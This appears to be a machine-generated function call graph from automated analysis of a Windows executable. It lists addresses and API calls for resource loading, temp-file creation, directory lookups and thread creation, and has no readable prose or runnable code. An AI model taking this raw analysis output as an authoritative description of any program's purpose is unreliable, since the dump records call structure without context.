8126 405eb0 7595->8126 7597 402f92 8136 405170 TlsGetValue 7597->8136 7599 40118d 7600 40e560 TlsGetValue 7599->7600 7601 40e5a6 RtlReAllocateHeap 7600->7601 7602 40e589 RtlAllocateHeap 7600->7602 7603 40e5c7 7601->7603 7602->7603 7603->7526 7605 40e660 21 API calls 7604->7605 7606 401baf 7605->7606 8161 40e520 GetLastError TlsGetValue SetLastError 7606->8161 7608 401bb5 8162 40e520 GetLastError TlsGetValue SetLastError 7608->8162 7610 401bc7 8163 40e520 GetLastError TlsGetValue SetLastError 7610->8163 7612 401bcf 8164 409698 7612->8164 7616 401bdb LoadLibraryExW 7617 4051a0 3 API calls 7616->7617 7618 401be8 EnumResourceTypesW FreeLibrary 7617->7618 7636 401c13 7618->7636 7619 401cb1 7620 40ab16 4 API calls 7619->7620 7621 401cbc 7620->7621 8172 40e520 GetLastError TlsGetValue SetLastError 7621->8172 7623 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7623->7636 7624 401cc2 8173 40e520 GetLastError TlsGetValue SetLastError 7624->8173 7626 401cca 8174 40e520 GetLastError TlsGetValue SetLastError 7626->8174 7628 401cd2 8175 40e520 GetLastError TlsGetValue SetLastError 7628->8175 7630 40e520 GetLastError TlsGetValue SetLastError 7630->7636 7631 401cda 8176 40e520 GetLastError TlsGetValue SetLastError 7631->8176 7633 401ce7 8177 40e520 GetLastError TlsGetValue SetLastError 7633->8177 7635 401cef 8178 405e10 7635->8178 7636->7619 7636->7623 7636->7630 7638 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7636->7638 7680 401e27 7636->7680 7638->7636 7641 401cff 8187 40d780 7641->8187 7645 401d0c 7646 405eb0 6 API calls 7645->7646 7647 401d14 7646->7647 7648 40e560 3 API calls 7647->7648 7649 401d1e 7648->7649 8191 40e520 GetLastError TlsGetValue SetLastError 7649->8191 7651 401d28 8192 40e6c0 7651->8192 7653 401d30 7654 40e560 3 API calls 7653->7654 7655 401d3a 7654->7655 8197 40e520 GetLastError TlsGetValue SetLastError 7655->8197 7657 401d40 8198 40e520 GetLastError TlsGetValue SetLastError 7657->8198 7659 401d48 8199 40e520 GetLastError TlsGetValue SetLastError 7659->8199 7661 401d50 8200 40e520 GetLastError TlsGetValue SetLastError 7661->8200 7663 401d58 7664 40d780 8 API calls 7663->7664 7665 401d68 7664->7665 8201 405182 TlsGetValue 7665->8201 7667 401d6d 7668 405eb0 6 API calls 7667->7668 7669 401d75 7668->7669 7670 40e560 3 API calls 7669->7670 7671 401d7f 7670->7671 8202 40e520 GetLastError TlsGetValue SetLastError 7671->8202 7673 401d85 8203 40e520 GetLastError TlsGetValue SetLastError 7673->8203 7675 401d8d 8204 405f20 7675->8204 7677 401d9d 7678 40e560 3 API calls 7677->7678 7679 401da7 7678->7679 7679->7680 8212 40985e 7679->8212 7683 401e23 7685 40e5f0 RtlFreeHeap 7683->7685 7688 401e3c 7685->7688 7686 401dc6 8218 40e520 GetLastError TlsGetValue SetLastError 7686->8218 7690 40e5f0 RtlFreeHeap 7688->7690 7689 401dce 8219 409872 7689->8219 7692 401e45 7690->7692 7694 40e5f0 RtlFreeHeap 7692->7694 7696 401e4e 7694->7696 7697 40e5f0 RtlFreeHeap 7696->7697 7699 401e57 7697->7699 7698 401ddf 8229 405160 7698->8229 7701 40e5f0 RtlFreeHeap 7699->7701 7702 40119c 7701->7702 7702->7529 7702->7530 7703 401dea 7703->7683 8232 40e520 GetLastError TlsGetValue SetLastError 7703->8232 7705 401e03 8233 40e520 GetLastError TlsGetValue SetLastError 7705->8233 7707 401e0b 7708 409872 21 API calls 7707->7708 7709 401e17 7708->7709 7710 40e560 3 API calls 7709->7710 7710->7683 7712 403f59 7711->7712 7712->7712 7713 40e660 21 API calls 7712->7713 7729 403f6b 7713->7729 7714 40e520 GetLastError TlsGetValue SetLastError 7739 403fec 7714->7739 7715 405dc0 3 API calls 7715->7729 7716 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7716->7729 7717 405dc0 3 API calls 7717->7739 7718 40e520 GetLastError TlsGetValue SetLastError 7730 40406d 7718->7730 7719 40e520 GetLastError TlsGetValue SetLastError 7719->7729 7720 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7720->7739 7721 405dc0 3 API calls 7721->7730 7722 405dc0 3 API calls 7724 4040ee 7722->7724 7723 40e520 GetLastError TlsGetValue SetLastError 7731 40416f 7723->7731 7724->7722 7724->7731 7735 40e520 GetLastError TlsGetValue SetLastError 7724->7735 7747 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7724->7747 7754 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7724->7754 7725 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7725->7729 7727 40e520 GetLastError TlsGetValue SetLastError 7740 4041f0 7727->7740 7728 40e520 GetLastError TlsGetValue SetLastError 7732 404275 7728->7732 7729->7715 7729->7716 7729->7719 7729->7725 7729->7739 7730->7718 7730->7721 7730->7724 7734 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7730->7734 7752 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7730->7752 7731->7723 7731->7740 7748 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7731->7748 7759 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7731->7759 8264 405dc0 7731->8264 7732->7728 7737 4042fa 7732->7737 7742 405dc0 3 API calls 7732->7742 7749 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7732->7749 7761 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7732->7761 7733 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7733->7739 7734->7730 7735->7724 7736 405dc0 3 API calls 7736->7740 7743 40e520 GetLastError TlsGetValue SetLastError 7737->7743 7750 405dc0 3 API calls 7737->7750 7755 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7737->7755 7766 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7737->7766 7774 40437f 7737->7774 7738 404404 8267 40e520 GetLastError TlsGetValue SetLastError 7738->8267 7739->7714 7739->7717 7739->7720 7739->7730 7739->7733 7740->7727 7740->7732 7740->7736 7741 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7740->7741 7760 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7740->7760 7741->7740 7742->7732 7743->7737 7744 40e520 GetLastError TlsGetValue SetLastError 7744->7774 7746 404410 7751 40e6c0 4 API calls 7746->7751 7747->7724 7748->7731 7749->7732 7750->7737 7753 404418 7751->7753 7752->7730 7757 40e6c0 4 API calls 7753->7757 7754->7724 7755->7737 7756 405dc0 3 API calls 7756->7774 7758 404422 7757->7758 7762 40e560 3 API calls 7758->7762 7759->7731 7760->7740 7761->7732 7763 40442e 7762->7763 8268 40e520 GetLastError TlsGetValue SetLastError 7763->8268 7765 404434 8269 403221 7765->8269 7766->7737 7769 40e560 3 API calls 7771 40444d 7769->7771 7770 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7770->7774 7773 40985e 17 API calls 7771->7773 7772 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7772->7774 7775 404452 GetModuleHandleW 7773->7775 7774->7738 7774->7744 7774->7756 7774->7770 7774->7772 8362 40e520 GetLastError TlsGetValue SetLastError 7775->8362 7777 40446b 8363 40e520 GetLastError TlsGetValue SetLastError 7777->8363 7779 404473 8364 40e520 GetLastError TlsGetValue SetLastError 7779->8364 7781 40447b 8365 40e520 GetLastError TlsGetValue SetLastError 7781->8365 7783 404483 7784 40d780 8 API calls 7783->7784 7785 404495 7784->7785 8366 405182 TlsGetValue 7785->8366 7787 40449a 7788 405eb0 6 API calls 7787->7788 7789 4044a2 7788->7789 7790 40e560 3 API calls 7789->7790 7791 4044ac 7790->7791 8367 40e520 GetLastError TlsGetValue SetLastError 7791->8367 7793 4044b2 8368 40e520 GetLastError TlsGetValue SetLastError 7793->8368 7795 4044ba 8369 40e520 GetLastError TlsGetValue SetLastError 7795->8369 7797 4044c2 8370 40e520 GetLastError TlsGetValue SetLastError 7797->8370 7799 4044ca 7800 40d780 8 API calls 7799->7800 7801 4044da 7800->7801 8371 405182 TlsGetValue 7801->8371 7803 4044df 7804 405eb0 6 API calls 7803->7804 7805 4044e7 7804->7805 7806 40e560 3 API calls 7805->7806 7807 4044f1 7806->7807 8372 402e49 7807->8372 7811 404504 8389 402150 7811->8389 7814 4051a0 3 API calls 7815 404514 7814->7815 8503 40196c 7815->8503 7821 404528 8594 403539 7821->8594 7824 40e560 3 API calls 7825 40454e PathRemoveBackslashW 7824->7825 7826 404562 7825->7826 8722 40e520 GetLastError TlsGetValue SetLastError 7826->8722 7828 404568 8723 40e520 GetLastError TlsGetValue SetLastError 7828->8723 7830 404570 8724 402ba6 7830->8724 7834 404582 8754 405182 TlsGetValue 7834->8754 7836 40458b 8755 4099a5 7836->8755 7839 4051a0 3 API calls 7840 404599 7839->7840 8759 40e520 GetLastError TlsGetValue SetLastError 7840->8759 7842 4045a5 7843 40e6c0 4 API calls 7842->7843 7844 4045ad 7843->7844 7845 40e6c0 4 API calls 7844->7845 7846 4045b9 7845->7846 7847 40e560 3 API calls 7846->7847 7848 4045c5 7847->7848 8760 403801 7848->8760 7852 4045d0 8954 401e66 7852->8954 7855 40e560 3 API calls 7856 4045e5 7855->7856 7857 4045f0 7856->7857 7858 404608 7856->7858 9084 40548c CreateThread 7857->9084 9094 402c55 7858->9094 7862 404611 9000 403c83 7862->9000 10392 40a54f 7885->10392 7888 40a524 7888->7502 7889 40a48b HeapAlloc 7891 40a513 HeapFree 7889->7891 7892 40a4ae 7889->7892 7891->7888 10403 40de99 7892->10403 7896 40a9e7 HeapAlloc 7895->7896 7897 40a9fc 7895->7897 7896->7897 7898 40de99 11 API calls 7897->7898 7899 40aa4f 7898->7899 7899->7506 7901 40e660 21 API calls 7900->7901 7902 402fba 7901->7902 10436 40e520 GetLastError TlsGetValue SetLastError 7902->10436 7904 402fc0 10437 40e520 GetLastError TlsGetValue SetLastError 7904->10437 7906 402fc8 10438 40e520 GetLastError TlsGetValue SetLastError 7906->10438 7908 402fd0 10439 40e520 GetLastError TlsGetValue SetLastError 7908->10439 7910 402fd8 7911 40d780 8 API calls 7910->7911 7912 402fea 7911->7912 10440 405182 TlsGetValue 7912->10440 7914 402fef 7915 405eb0 6 API calls 7914->7915 7916 402ff7 7915->7916 7917 40e560 3 API calls 7916->7917 7918 403001 7917->7918 10441 40e520 GetLastError TlsGetValue SetLastError 7918->10441 7920 403007 10442 40e520 GetLastError TlsGetValue SetLastError 7920->10442 7922 40300f 10443 40e520 GetLastError TlsGetValue SetLastError 7922->10443 7924 403017 10444 40e520 GetLastError TlsGetValue SetLastError 7924->10444 7926 40301f 7927 40d780 8 API calls 7926->7927 7928 40302f 7927->7928 10445 405182 TlsGetValue 7928->10445 7930 403034 7931 405eb0 6 API calls 7930->7931 7932 40303c 7931->7932 7933 40e560 3 API calls 7932->7933 7934 403046 7933->7934 7935 402e49 35 API calls 7934->7935 7936 40304e 7935->7936 10446 40e520 GetLastError TlsGetValue SetLastError 7936->10446 7938 403058 7939 402150 122 API calls 7938->7939 7940 403063 7939->7940 7941 4051a0 3 API calls 7940->7941 7942 403068 7941->7942 10447 40e520 GetLastError TlsGetValue SetLastError 7942->10447 7944 40306e 10448 40e520 GetLastError TlsGetValue SetLastError 7944->10448 7946 403076 7947 409355 33 API calls 7946->7947 7948 403089 7947->7948 7949 40e560 3 API calls 7948->7949 7950 403093 7949->7950 7951 4031ea 7950->7951 10449 40e520 GetLastError TlsGetValue SetLastError 7950->10449 7951->7951 7953 4030aa 10450 40e520 GetLastError TlsGetValue SetLastError 7953->10450 7955 4030b2 10451 40e520 GetLastError TlsGetValue SetLastError 7955->10451 7957 4030ba 10452 40e520 GetLastError TlsGetValue SetLastError 7957->10452 7959 4030c2 7960 40d780 8 API calls 7959->7960 7961 4030d4 7960->7961 10453 405182 TlsGetValue 7961->10453 7963 4030d9 7964 405eb0 6 API calls 7963->7964 7965 4030e1 7964->7965 7966 40e560 3 API calls 7965->7966 7967 4030eb 7966->7967 10454 40e520 GetLastError TlsGetValue SetLastError 7967->10454 7969 4030f1 10455 40e520 GetLastError TlsGetValue SetLastError 7969->10455 7971 4030f9 10456 40e520 GetLastError TlsGetValue SetLastError 7971->10456 7973 403101 10457 40e520 GetLastError TlsGetValue SetLastError 7973->10457 7975 403109 7976 40d780 8 API calls 7975->7976 7977 40311b 7976->7977 10458 405182 TlsGetValue 7977->10458 7979 403120 7980 405eb0 6 API calls 7979->7980 7981 403128 7980->7981 7982 40e560 3 API calls 7981->7982 7983 403132 7982->7983 10459 40e520 GetLastError TlsGetValue SetLastError 7983->10459 7985 403138 7986 403e37 84 API calls 7985->7986 7987 403148 7986->7987 7988 40e560 3 API calls 7987->7988 7989 403154 7988->7989 10460 40e520 GetLastError TlsGetValue SetLastError 7989->10460 7991 40315a 7992 403e37 84 API calls 7991->7992 7993 40316a 7992->7993 7994 40e560 3 API calls 7993->7994 7995 403174 PathAddBackslashW 7994->7995 10461 40e520 GetLastError TlsGetValue SetLastError 7995->10461 7997 403183 10462 40e520 GetLastError TlsGetValue SetLastError 7997->10462 7999 403193 8000 40e6c0 4 API calls 7999->8000 8001 40319b 8000->8001 8002 40e6c0 4 API calls 8001->8002 8003 4031a7 8002->8003 10463 405182 TlsGetValue 8003->10463 8005 4031ac 8006 4023b8 34 API calls 8005->8006 8007 4031b4 8006->8007 8008 4051a0 3 API calls 8007->8008 8009 4031b9 8008->8009 10464 40e520 GetLastError TlsGetValue SetLastError 8009->10464 8011 4031c3 8012 40e6c0 4 API calls 8011->8012 8013 4031cb 8012->8013 8014 40e560 3 API calls 8013->8014 8015 4031d7 PathRemoveBackslashW 8014->8015 8016 402c55 141 API calls 8015->8016 8016->7951 8031->7540 8032->7543 8034 40d9e2 8033->8034 8035 40da20 TlsGetValue HeapReAlloc TlsSetValue 8034->8035 8036 40d9f8 TlsAlloc HeapAlloc TlsSetValue 8034->8036 8037 40da60 8035->8037 8038 40da5c 8035->8038 8036->8035 8043 40e1f2 HeapAlloc 8037->8043 8038->8037 8040 409674 8038->8040 8042 40dbac HeapAlloc HeapAlloc InitializeCriticalSection 8040->8042 8042->7549 8044 40da6c 8043->8044 8044->8040 8046 40e7e1 wcslen 8045->8046 8047 40e84d 8045->8047 8048 40e816 HeapReAlloc 8046->8048 8049 40e7f8 HeapAlloc 8046->8049 8050 40e855 HeapFree 8047->8050 8051 40e838 8047->8051 8048->8051 8049->8051 8050->8051 8051->7554 8053 40ab46 8052->8053 8057 40ab27 8052->8057 8054 40aa6b 8053->8054 8055 40ddcb 3 API calls 8053->8055 8059 40dfc6 8054->8059 8055->8053 8057->8054 8072 41242a 8057->8072 8077 40ddcb 8057->8077 8060 40dfd3 EnterCriticalSection 8059->8060 8061 40e038 8059->8061 8063 40e02e LeaveCriticalSection 8060->8063 8064 40dfef 8060->8064 8087 40dd5d 8061->8087 8065 40aa73 8063->8065 8067 40dfc6 4 API calls 8064->8067 8065->7561 8065->7565 8070 40dff9 HeapFree 8067->8070 8068 40e044 DeleteCriticalSection 8069 40e04e HeapFree 8068->8069 8069->8065 8070->8063 8073 412525 8072->8073 8076 412442 8072->8076 8073->8057 8074 41242a RtlFreeHeap 8074->8076 8076->8073 8076->8074 8084 40e5f0 8076->8084 8078 40ddd8 EnterCriticalSection 8077->8078 8081 40dde2 8077->8081 8078->8081 8079 40de94 8079->8057 8080 40de8a LeaveCriticalSection 8080->8079 8082 40de4b 8081->8082 8083 40de35 HeapFree 8081->8083 8082->8079 8082->8080 8083->8082 8085 40e5fb RtlFreeHeap 8084->8085 8086 40e60e 8084->8086 8085->8086 8086->8076 8088 40dd75 8087->8088 8089 40dd6b EnterCriticalSection 8087->8089 8090 40dd92 8088->8090 8091 40dd7c HeapFree 8088->8091 8089->8088 8092 40dd98 HeapFree 8090->8092 8093 40ddae 8090->8093 8091->8090 8091->8091 8092->8092 8092->8093 8094 40ddc5 8093->8094 8095 40ddbb LeaveCriticalSection 8093->8095 8094->8068 8094->8069 8095->8094 8097 40e277 8096->8097 8101 40e3c2 8096->8101 8097->7569 8097->7571 8098 40e3ed HeapFree 8098->8097 8099 40e3eb 8099->8098 8100 41242a RtlFreeHeap 8100->8101 8101->8098 8101->8099 8101->8100 8103 40e68a TlsGetValue 8102->8103 8104 40e66c 8102->8104 8106 402ef9 8103->8106 8107 40e69b 8103->8107 8105 40e4d0 5 API calls 8104->8105 8108 40e671 TlsGetValue 8105->8108 8114 4051a0 8106->8114 8146 40ed40 HeapAlloc HeapAlloc TlsSetValue 8107->8146 8137 412722 8108->8137 8111 40e6a0 TlsGetValue 8113 412722 13 API calls 8111->8113 8113->8106 8147 40ee20 GetLastError TlsGetValue SetLastError 8114->8147 8116 4051ab 8116->7583 8117->7585 8118->7587 8119->7589 8120->7591 8123 40d7ad 8121->8123 8148 40d8a0 8123->8148 8125 405182 TlsGetValue 8125->7595 8127 405ebd 8126->8127 8158 40e880 TlsGetValue 8127->8158 8130 40e900 3 API calls 8131 405ed1 8130->8131 8133 405edd 8131->8133 8160 40ea10 TlsGetValue 8131->8160 8134 405f0d 8133->8134 8135 405f00 CharUpperW 8133->8135 8134->7597 8135->7597 8136->7599 8138 412732 TlsAlloc InitializeCriticalSection 8137->8138 8139 41274e TlsGetValue 8137->8139 8138->8139 8140 412764 HeapAlloc 8139->8140 8141 4127eb HeapAlloc 8139->8141 8142 41277e EnterCriticalSection 8140->8142 8143 40e688 8140->8143 8141->8143 8144 412790 7 API calls 8142->8144 8145 41278e 8142->8145 8143->8106 8144->8141 8145->8144 8146->8111 8147->8116 8149 40d8ac 8148->8149 8152 40e900 TlsGetValue 8149->8152 8153 40e91b 8152->8153 8154 40e941 RtlReAllocateHeap 8153->8154 8155 40e974 8153->8155 8156 402f85 8154->8156 8155->8156 8157 40e990 HeapReAlloc 8155->8157 8156->8125 8157->8156 8159 405ec5 8158->8159 8159->8130 8160->8133 8161->7608 8162->7610 8163->7612 8165 40e900 3 API calls 8164->8165 8166 4096aa GetModuleFileNameW wcscmp 8165->8166 8167 4096e5 8166->8167 8168 4096cd memmove 8166->8168 8234 40ea90 TlsGetValue 8167->8234 8168->8167 8170 401bd6 8171 405182 TlsGetValue 8170->8171 8171->7616 8172->7624 8173->7626 8174->7628 8175->7631 8176->7633 8177->7635 8179 405e1d 8178->8179 8180 40e880 TlsGetValue 8179->8180 8181 405e40 8180->8181 8182 40e900 3 API calls 8181->8182 8183 405e4c 8182->8183 8184 401cfa 8183->8184 8235 40ea10 TlsGetValue 8183->8235 8186 405182 TlsGetValue 8184->8186 8186->7641 8236 40d700 8187->8236 8190 405182 TlsGetValue 8190->7645 8191->7651 8193 40e6e2 8192->8193 8194 40e6d3 wcslen 8192->8194 8195 40e900 3 API calls 8193->8195 8194->8193 8196 40e6ed 8195->8196 8196->7653 8197->7657 8198->7659 8199->7661 8200->7663 8201->7667 8202->7673 8203->7675 8205 405f2e 8204->8205 8206 40e880 TlsGetValue 8205->8206 8207 405f4a 8206->8207 8208 40e900 3 API calls 8207->8208 8209 405f56 8208->8209 8211 405f62 8209->8211 8252 40ea10 TlsGetValue 8209->8252 8211->7677 8253 40d968 TlsGetValue 8212->8253 8217 40e520 GetLastError TlsGetValue SetLastError 8217->7686 8218->7689 8220 40d968 16 API calls 8219->8220 8221 409885 8220->8221 8222 40973a 17 API calls 8221->8222 8223 409898 8222->8223 8224 40e900 3 API calls 8223->8224 8225 4098a6 8224->8225 8262 40ea90 TlsGetValue 8225->8262 8227 401dda 8228 40e720 TlsGetValue 8227->8228 8228->7698 8263 40ede0 TlsGetValue 8229->8263 8231 40516a 8231->7703 8232->7705 8233->7707 8234->8170 8235->8184 8237 40d712 8236->8237 8238 40d75d 8237->8238 8241 40d732 8237->8241 8239 40d8a0 3 API calls 8238->8239 8240 401d07 8239->8240 8240->8190 8245 412840 8241->8245 8243 40d738 8251 412830 free 8243->8251 8246 4128b4 malloc 8245->8246 8247 41284c WideCharToMultiByte 8245->8247 8246->8243 8247->8246 8249 412880 malloc 8247->8249 8249->8246 8250 412892 WideCharToMultiByte 8249->8250 8250->8243 8251->8238 8252->8211 8254 40d97b HeapAlloc TlsSetValue 8253->8254 8257 409869 8253->8257 8255 40d9a7 8254->8255 8256 412722 13 API calls 8255->8256 8256->8257 8258 40973a 8257->8258 8259 40d968 16 API calls 8258->8259 8260 40974b GetCommandLineW 8259->8260 8261 401dbc 8260->8261 8261->7683 8261->8217 8262->8227 8263->8231 8265 40e900 3 API calls 8264->8265 8266 405dcb 8265->8266 8266->7731 8267->7746 8268->7765 8270 403227 8269->8270 8270->8270 8271 40e660 21 API calls 8270->8271 8272 403239 8271->8272 8273 4051a0 3 API calls 8272->8273 8274 403242 8273->8274 9174 405060 8274->9174 8277 405060 2 API calls 8278 40325b 8277->8278 9177 402b6d 8278->9177 8281 403264 9182 405573 GetVersionExW 8281->9182 8282 403277 8285 403281 8282->8285 8286 4033e7 8282->8286 9188 40e520 GetLastError TlsGetValue SetLastError 8285->9188 9220 40e520 GetLastError TlsGetValue SetLastError 8286->9220 8289 4033ed 9221 40e520 GetLastError TlsGetValue SetLastError 8289->9221 8290 403287 9189 40e520 GetLastError TlsGetValue SetLastError 8290->9189 8293 4033f5 8295 4062c0 3 API calls 8293->8295 8294 40328f 9190 4062c0 8294->9190 8298 403401 8295->8298 8300 40e560 3 API calls 8298->8300 8299 40e560 3 API calls 8301 4032a5 GetWindowsDirectoryW PathAddBackslashW 8299->8301 8302 40340b GetSystemDirectoryW PathAddBackslashW 8300->8302 9193 40e520 GetLastError TlsGetValue SetLastError 8301->9193 8353 4033e5 8302->8353 8304 4032c6 8307 40e6c0 4 API calls 8304->8307 8306 40342c 8308 40e6c0 4 API calls 8306->8308 8309 4032ce 8307->8309 8310 403434 8308->8310 8311 40e6c0 4 API calls 8309->8311 9223 405170 TlsGetValue 8310->9223 8313 4032d9 8311->8313 8315 40e560 3 API calls 8313->8315 8314 40343b 8318 40e5f0 RtlFreeHeap 8314->8318 8316 4032e3 PathAddBackslashW 8315->8316 9194 40e520 GetLastError TlsGetValue SetLastError 8316->9194 8320 403453 8318->8320 8319 4032f6 8321 40e6c0 4 API calls 8319->8321 8322 40e5f0 RtlFreeHeap 8320->8322 8324 4032fe 8321->8324 8323 40345b 8322->8323 8325 40e5f0 RtlFreeHeap 8323->8325 8326 40e6c0 4 API calls 8324->8326 8328 403464 8325->8328 8327 403308 8326->8327 8329 40e560 3 API calls 8327->8329 8330 40e5f0 RtlFreeHeap 8328->8330 8331 403312 8329->8331 8332 40346d 8330->8332 9195 40e520 GetLastError TlsGetValue SetLastError 8331->9195 8334 40e5f0 RtlFreeHeap 8332->8334 8336 403476 8334->8336 8335 40331c 8337 40e6c0 4 API calls 8335->8337 8336->7769 8338 403324 8337->8338 8339 40e6c0 4 API calls 8338->8339 8340 40332e 8339->8340 8341 40e6c0 4 API calls 8340->8341 8342 403338 8341->8342 8343 40e560 3 API calls 8342->8343 8344 403342 8343->8344 9196 40b440 8344->9196 8346 403350 8347 403366 8346->8347 9206 40b050 8346->9206 8349 40b440 11 API calls 8347->8349 8350 40337e 8349->8350 8351 403394 8350->8351 8352 40b050 11 API calls 8350->8352 8351->8353 9218 40e520 GetLastError TlsGetValue SetLastError 8351->9218 8352->8351 9222 40e520 GetLastError TlsGetValue SetLastError 8353->9222 8355 4033b0 9219 40e520 GetLastError TlsGetValue SetLastError 8355->9219 8357 4033b8 8358 4062c0 3 API calls 8357->8358 8359 4033c4 8358->8359 8360 40e560 3 API calls 8359->8360 8361 4033ce GetSystemDirectoryW PathAddBackslashW 8360->8361 8361->8353 8362->7777 8363->7779 8364->7781 8365->7783 8366->7787 8367->7793 8368->7795 8369->7797 8370->7799 8371->7803 8373 40e660 21 API calls 8372->8373 8374 402e56 8373->8374 8375 405060 2 API calls 8374->8375 8376 402e62 FindResourceW 8375->8376 8377 402e81 8376->8377 8378 402e9d 8376->8378 9269 402664 8377->9269 9280 40a220 8378->9280 8382 402eac 9283 40ee60 8382->9283 8386 40e5f0 RtlFreeHeap 8387 402ee7 8386->8387 8388 40e520 GetLastError TlsGetValue SetLastError 8387->8388 8388->7811 8390 40e660 21 API calls 8389->8390 8391 40215c 8390->8391 8392 4051a0 3 API calls 8391->8392 8393 402165 8392->8393 8485 40235a 8393->8485 9309 40e520 GetLastError TlsGetValue SetLastError 8393->9309 8396 402184 9310 40e520 GetLastError TlsGetValue SetLastError 8396->9310 8397 402370 8399 40e6c0 4 API calls 8397->8399 8401 402378 8399->8401 8400 40218c 9311 40e520 GetLastError TlsGetValue SetLastError 8400->9311 9416 405170 TlsGetValue 8401->9416 8404 402194 9312 40e520 GetLastError TlsGetValue SetLastError 8404->9312 8405 40237f 8408 40e5f0 RtlFreeHeap 8405->8408 8407 40219c 9313 40a290 8407->9313 8410 402397 8408->8410 8411 40e5f0 RtlFreeHeap 8410->8411 8413 4023a0 8411->8413 8412 4021b0 9322 405182 TlsGetValue 8412->9322 8415 40e5f0 RtlFreeHeap 8413->8415 8417 4023a8 8415->8417 8416 4021b5 9323 406060 8416->9323 8419 40e5f0 RtlFreeHeap 8417->8419 8422 4023b1 8419->8422 8421 40e560 3 API calls 8423 4021c7 8421->8423 8422->7814 9326 40e520 GetLastError TlsGetValue SetLastError 8423->9326 8425 4021cd 9327 40e520 GetLastError TlsGetValue SetLastError 8425->9327 8427 4021d5 9328 40e520 GetLastError TlsGetValue SetLastError 8427->9328 8429 4021dd 9329 40e520 GetLastError TlsGetValue SetLastError 8429->9329 8431 4021e5 8432 40a290 5 API calls 8431->8432 8433 4021fc 8432->8433 9330 405182 TlsGetValue 8433->9330 8435 402201 8436 406060 5 API calls 8435->8436 8437 402209 8436->8437 8438 40e560 3 API calls 8437->8438 8439 402213 8438->8439 9331 40e520 GetLastError TlsGetValue SetLastError 8439->9331 8441 402219 9332 40e520 GetLastError TlsGetValue SetLastError 8441->9332 8443 402221 9333 40e520 GetLastError TlsGetValue SetLastError 8443->9333 8445 402234 9334 40e520 GetLastError TlsGetValue SetLastError 8445->9334 8447 40223c 9335 4057f0 8447->9335 8449 402252 9351 40e720 TlsGetValue 8449->9351 8451 402257 9352 40e520 GetLastError TlsGetValue SetLastError 8451->9352 8453 40225d 9353 40e520 GetLastError TlsGetValue SetLastError 8453->9353 8455 402265 8456 4057f0 9 API calls 8455->8456 8457 40227b 8456->8457 9354 405182 TlsGetValue 8457->9354 8459 402280 9355 405182 TlsGetValue 8459->9355 8461 402288 9356 408f69 8461->9356 8463 402291 8464 40e560 3 API calls 8463->8464 8465 40229b 8464->8465 8466 40235c 8465->8466 8467 4022ac 8465->8467 8468 401fba 36 API calls 8466->8468 9398 40e520 GetLastError TlsGetValue SetLastError 8467->9398 8468->8485 8470 4022b2 9399 40e520 GetLastError TlsGetValue SetLastError 8470->9399 8472 4022ba 9400 40e520 GetLastError TlsGetValue SetLastError 8472->9400 8474 4022c7 9401 40e520 GetLastError TlsGetValue SetLastError 8474->9401 8476 4022cf 8477 406060 5 API calls 8476->8477 8478 4022da 8477->8478 9402 405182 TlsGetValue 8478->9402 8480 4022df 8481 40d780 8 API calls 8480->8481 8482 4022e7 8481->8482 8483 40e560 3 API calls 8482->8483 8484 4022f1 8483->8484 8484->8485 9403 40e520 GetLastError TlsGetValue SetLastError 8484->9403 9415 40e520 GetLastError TlsGetValue SetLastError 8485->9415 8487 402307 9404 40e520 GetLastError TlsGetValue SetLastError 8487->9404 8489 402314 9405 40e520 GetLastError TlsGetValue SetLastError 8489->9405 8491 40231c 8492 4057f0 9 API calls 8491->8492 8493 402332 8492->8493 9406 40e720 TlsGetValue 8493->9406 8495 402337 9407 405182 TlsGetValue 8495->9407 8497 402342 9408 408e27 8497->9408 8500 4051a0 3 API calls 8501 402350 8500->8501 8502 401fba 36 API calls 8501->8502 8502->8485 8504 40e660 21 API calls 8503->8504 8523 40197a 8504->8523 8505 4019fb 8506 40a220 RtlAllocateHeap 8505->8506 8507 401a05 8506->8507 9467 40e520 GetLastError TlsGetValue SetLastError 8507->9467 8509 401a0f 9468 40e520 GetLastError TlsGetValue SetLastError 8509->9468 8511 405dc0 3 API calls 8511->8523 8512 401a17 9469 40add6 8512->9469 8513 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8513->8523 8516 40e520 GetLastError TlsGetValue SetLastError 8516->8523 8517 40e560 3 API calls 8518 401a28 GetTempFileNameW 8517->8518 9478 40e520 GetLastError TlsGetValue SetLastError 8518->9478 8520 401a46 9479 40e520 GetLastError TlsGetValue SetLastError 8520->9479 8521 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 8521->8523 8523->8505 8523->8511 8523->8513 8523->8516 8523->8521 8524 401a4e 8525 40a240 4 API calls 8524->8525 8526 401a59 8525->8526 8527 40e560 3 API calls 8526->8527 8528 401a65 8527->8528 9480 40ae67 8528->9480 8534 401a9b 9489 40e520 GetLastError TlsGetValue SetLastError 8534->9489 8536 401aa3 8537 40a240 4 API calls 8536->8537 8538 401aae 8537->8538 8539 40e560 3 API calls 8538->8539 8540 401aba 8539->8540 8541 40ae67 2 API calls 8540->8541 8542 401ac5 8541->8542 8543 40ad45 3 API calls 8542->8543 8544 401ad0 GetTempFileNameW PathAddBackslashW 8543->8544 9490 40e520 GetLastError TlsGetValue SetLastError 8544->9490 8546 401afb 9491 40e520 GetLastError TlsGetValue 